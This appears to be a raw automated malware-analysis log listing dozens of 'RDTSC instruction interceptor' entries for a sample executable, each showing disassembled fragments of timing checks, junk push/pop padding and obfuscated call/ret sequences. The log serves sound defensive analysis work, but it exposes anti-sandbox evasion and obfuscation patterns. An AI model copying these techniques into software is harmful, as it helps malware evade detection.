Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E5E38 second address: 8E5E43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F5F64D1DF16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E63B8 second address: 8E63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88D7 second address: 8E88DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88DC second address: 8E88E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88E6 second address: 8E890F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 172FBC6Eh 0x00000013 jnl 00007F5F64D1DF1Ch 0x00000019 push BE287C2Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E890F second address: 8E8926 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A0B second address: 8E8A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A11 second address: 8E8A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94C6 second address: 8E94CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94CC second address: 8E94FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5F64D1DABFh 0x0000000e xchg eax, ebx 0x0000000f movzx edi, dx 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop ebx 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94FA second address: 8E9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9503 second address: 8E9507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E95DD second address: 8E95EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FD0 second address: 8E9FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FE7 second address: 8EA005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5F64D1DF16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBACF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB32B second address: 8EB33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB33E second address: 8EB349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5F64D1DAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8ECD18 second address: 8ECD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1B2 second address: 8EF1C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1C0 second address: 8EF1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F5F64D1DF2Eh 0x00000010 jmp 00007F5F64D1DF28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E8F second address: 8F1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E94 second address: 8F1EB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007F5F64D1DF18h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1EB5 second address: 8F1F1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5F64D1DAB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+1245ED66h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F5F64D1DAB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 stc 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D29EBh] 0x0000004f xchg eax, esi 0x00000050 push edi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F1F second address: 8F1F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F23 second address: 8F1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DB9 second address: 8F2DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DBD second address: 8F2DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCB second address: 8F2DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCF second address: 8F2DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DD5 second address: 8F2E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F5F64D1DF18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007F5F64D1DF1Dh 0x00000045 push 00000000h 0x00000047 mov di, si 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jp 00007F5F64D1DF16h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F3D7E second address: 8F3DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e je 00007F5F64D1DAB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 pushad 0x00000019 mov dword ptr [ebp+122D1B00h], esi 0x0000001f clc 0x00000020 popad 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+12483267h], eax 0x00000029 push 00000000h 0x0000002b movsx ebx, ax 0x0000002e push eax 0x0000002f jo 00007F5F64D1DACDh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DA4 second address: 8F5DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DAD second address: 8F5DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DB8 second address: 8F5DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06C5 second address: 8B06D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5F64D1DAB8h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06D6 second address: 8B06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E1 second address: 8B06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E5 second address: 8B06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F5F64D1DF16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5F64D1DF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F631C second address: 8F6395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DACFh 0x00000008 jmp 00007F5F64D1DAC9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 je 00007F5F64D1DABCh 0x00000016 mov dword ptr [ebp+12450B5Eh], edx 0x0000001c push 00000000h 0x0000001e add dword ptr [ebp+122D3055h], eax 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F5F64D1DAB8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5F64D1DAC2h 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F6395 second address: 8F639B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F639B second address: 8F639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8390 second address: 8F8396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F7633 second address: 8F7638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F84FB second address: 8F8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8501 second address: 8F8586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F5F64D1DAC4h 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F5F64D1DAB8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov bx, dx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c push edi 0x0000003d movsx edi, ax 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, ecx 0x0000004a mov eax, dword ptr [ebp+122D13C1h] 0x00000050 add bl, 00000032h 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D1878h], eax 0x0000005b nop 0x0000005c jc 00007F5F64D1DAC8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F5F64D1DABAh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8586 second address: 8F85A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DF27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA405 second address: 8FA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA409 second address: 8FA42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DF29h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C1 second address: 8A32C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C5 second address: 8A3307 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 jmp 00007F5F64D1DF1Ch 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5F64D1DF1Fh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDAEF second address: 8FDAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFA36 second address: 8FFA40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 900A67 second address: 900A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDCFE second address: 8FDD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B64 second address: 901B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B7E second address: 901BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bh, 08h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D19D0h] 0x0000002e push 00000000h 0x00000030 or ebx, 0894BF9Bh 0x00000036 xchg eax, esi 0x00000037 jmp 00007F5F64D1DF1Fh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 je 00007F5F64D1DF16h 0x00000046 jnp 00007F5F64D1DF16h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC4C second address: 8FFC5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC5E second address: 8FFC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC68 second address: 8FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4A second address: 902C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4E second address: 902C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C54 second address: 902C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901D78 second address: 901D9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F5F64D1DAB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901EBB second address: 901EC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903ADD second address: 903AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903AE2 second address: 903AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90E15E second address: 90E164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D879 second address: 90D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jg 00007F5F64D1DF16h 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F5F64D1DF16h 0x00000018 pop ecx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d jng 00007F5F64D1DF28h 0x00000023 jmp 00007F5F64D1DF1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9E8 second address: 90D9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9EC second address: 90D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9F6 second address: 90D9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90DCDE second address: 90DCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110F7 second address: 9110FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110FD second address: 911113 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F5F64D1DF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911113 second address: 91114E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5F64D1DAC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91114E second address: 911175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F5F64D1DF21h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91132F second address: 911333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
